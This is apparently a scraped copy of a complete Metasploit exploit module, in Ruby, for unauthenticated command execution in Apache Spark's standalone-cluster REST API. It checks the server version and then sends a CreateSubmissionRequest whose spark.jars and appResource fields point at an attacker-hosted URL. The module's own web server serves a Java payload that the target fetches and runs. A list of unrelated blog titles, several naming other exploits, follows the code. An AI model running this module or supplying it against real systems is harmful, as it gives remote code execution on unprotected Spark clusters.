##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})

    super(update_info(info,

      'Name'           => 'Apache Spark Unauthenticated Command Execution',

      'Description'    => %q{

          This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.

          It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.

      },

      'License'        => MSF_LICENSE,

      'Author'         =>

        [

          'aRe00t',                            # Proof of concept

          'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module

        ],

      'References'     =>

        [

          ['URL', 'https://www.jianshu.com/p/a080cb323832'],

          ['URL', 'https://github.com/vulhub/vulhub/tree/master/spark/unacc']

        ],

      'Platform'       => 'java',

      'Arch'           => [ARCH_JAVA],

      'Targets'        =>

        [

          ['Automatic', {}]

        ],

      'Privileged'     => false,

      'DisclosureDate' => 'Dec 12 2017',

      'DefaultTarget'  => 0,

      'Notes'          =>

        {

          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],

          'Stability'   => [ CRASH_SAFE ],

          'Reliability' => [ REPEATABLE_SESSION]

        }

    ))

    register_options [

      Opt::RPORT(6066),

      OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])

    ]

  end

  def check

    return CheckCode::Detected if get_version

    CheckCode::Unknown

  end

  def primer

    path = service.resources.keys[0]

    binding_ip = srvhost_addr

    proto = datastore['SSL'] ? 'https' : 'http'

    payload_uri = "#{proto}://#{binding_ip}:#{datastore['SRVPORT']}/#{path}"

    send_payload(payload_uri)

  end

  def exploit

    fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version

    vprint_status("Generating payload ...")

    @pl = generate_payload.encoded_jar(random:true)

    print_error("Failed to generate the payload.") unless @pl

    print_status("Starting up our web service ...")

    Timeout.timeout(datastore['HTTPDELAY']) { super }

  rescue Timeout::Error

  end

  def get_version

    @version = nil

    res = send_request_cgi(

      'uri'           => normalize_uri(target_uri.path),

      'method'        => 'GET'

    )

    unless res

      vprint_bad("#{peer} - No response. ")

      return false

    end

    if res.code == 401

      print_bad("#{peer} - Authentication required.")

      return false

    end

    unless res.code == 400

      return false

    end

    res_json = res.get_json_document

    @version = res_json['serverSparkVersion']

    if @version.nil?

      vprint_bad("#{peer} - Cannot parse the response, seems like it's not Spark REST API.")

      return false

    end

    true

  end

  def send_payload(payload_uri)

    rand_appname   = Rex::Text.rand_text_alpha_lower(8..16)

    data =

    {

      "action"                    => "CreateSubmissionRequest",

      "clientSparkVersion"        => @version.to_s,

      "appArgs"                   => [],

      "appResource"               => payload_uri.to_s,

      "environmentVariables"      => {"SPARK_ENV_LOADED" => ""},

      "mainClass"                 => "#{@pl.substitutions["metasploit"]}.Payload",

      "sparkProperties"           =>

      {

        "spark.jars"              => payload_uri.to_s,

        "spark.driver.supervise"  => "false",

        "spark.app.name"          => rand_appname.to_s,

        "spark.eventLog.enabled"  => "true",

        "spark.submit.deployMode" => "cluster",

        "spark.master"            => "spark://#{rhost}:#{rport}"

      }

    }

    res = send_request_cgi(

      'uri'           => normalize_uri(target_uri.path, "/v1/submissions/create"),

      'method'        => 'POST',

      'ctype'         => 'application/json;charset=UTF-8',

      'data'          => data.to_json

    )

  end

  # Handle incoming requests

  def on_request_uri(cli, request)

    print_status("#{rhost}:#{rport} - Sending the payload to the server...")

    send_response(cli, @pl)

  end

end

[EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. [EXP]Huawei Router HG532e - Command Execution

    #!/bin/python ''' Author : Rebellion Github : @rebe11ion Twitter : @rebellion ''' import urllib2,req ...

  4. [EXP]Apache Tika-server < 1.18 - Command Injection

    #################################################################################################### ...

  5. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  7. Why Apache Spark is a Crossover Hit for Data Scientists [FWD]

    Spark is a compelling multi-purpose platform for use cases that span investigative, as well as opera ...

  8. Apache Spark源码走读之13 -- hiveql on spark实现详解

    欢迎转载,转载请注明出处,徽沪一郎 概要 在新近发布的spark 1.0中新加了sql的模块,更为引人注意的是对hive中的hiveql也提供了良好的支持,作为一个源码分析控,了解一下spark是如何 ...

  9. Apache Spark 2.2.0 中文文档

    Apache Spark 2.2.0 中文文档 - 快速入门 | ApacheCN Geekhoo 关注 2017.09.20 13:55* 字数 2062 阅读 13评论 0喜欢 1 快速入门 使用 ...

随机推荐

  1. 解决HighChart开发遇到的2个问题

    需求很简单,显示一条24小时的变化曲线 写完代码效果是只有一条直线,连时间轴都没有 第1个错误  Highcharts error #12 当通过要绘制的点超过1000个时就会报这个错,我按分钟计算间 ...

  2. day39 mysql数据库基本操作

    什么是数据库 用来存储数据的仓库 数据库可以在硬盘及内存中存储数据 主要学习硬盘中存储数据,因为内存中的数据总有一天会丢失 数据库与文件存储数据区别 (公司的开发是综合内容的) 数据库本质也是通过文件 ...

  3. 用php获取js变量的值

    <script type="text/javascript"> var t1 = "fff"; var t2 = "<?php ec ...

  4. zabbix安装(Ubuntu)

    zabbix的安装 Zabbix监控架构至少需要server,agent,web模块.mysql.web部分和server安装在同一台机器上. Zabbix安装前服务器要做时间同步(ntp) 1.创建 ...

  5. Matplotlib 基本用法

    1.基础应用 >>> import matplotlib.pyplot as plt >>> import numpy as np #使用np.linspace定义 ...

  6. wget下载指定URL下的特定属性文件

    例子:下载指定URL下的kernel开头的所有包 wget https://archives.fedoraproject.org/pub/fedora/linux/updates/28/Everyth ...

  7. PowerShell 脚本中调用密文密码

    1. 把密码转变为加密的字符串.使用命令 ConvertFrom-SecureString Read-Host "Enter Password" -AsSecureString | ...

  8. leveldb 学习记录(八) compact

    随着运行时间的增加,memtable会慢慢 转化成 sstable. sstable会越来越多 我们就需要进行整合 compact 代码会在写入查询key值 db写入时等多出位置调用MaybeSche ...

  9. ----关于position的四个标签----

    从[ two1-4 ]分别为absolute,fixed,static,relative标签 四个标签下位移值相同,[ two2 ]和[ two1 ]都出现在左上角,[ two2 ] 盖住了[ two ...

  10. Spring配置Bean,为属性赋值

    SayHello的实体类: package com.langchao; /** * @ClassName: SayHello * @description: * @author: ZhangYawei ...